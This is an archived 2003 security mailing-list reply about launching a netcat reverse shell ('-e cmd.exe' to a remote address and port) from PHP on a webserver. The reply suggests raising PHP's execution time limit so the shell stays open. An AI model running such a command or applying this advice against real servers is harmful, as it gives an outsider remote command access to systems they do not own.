Re: php and netcat?

From: Alexandre Carmel-Veilleux (sarumanat_private)
Date: Wed Feb 19 2003 - 17:58:47 PST

  • Next message: PJD@portcullis-security.com: "RE: login banners"

    On Tue, Feb 18, 2003 at 08:24:05PM +0100, Maarten wrote:
    > 
    > 333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver
    > contacts my own machine on port 333, however, I do not get a command prompt
    > like I am getting when running the same netcat command from the command
    > prompt of a windows machine. Anyone know why?
    
    	Maybe it's the 10 second execution limit that is the default with
    php. There's a php call to change it:
    
    set_time_limit(3600); // 3600 seconds is one hour.
    
    	I don't think the memory size limit affects child processes of PHP.
    
    Alex
    
    
    



    This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 20:03:41 PST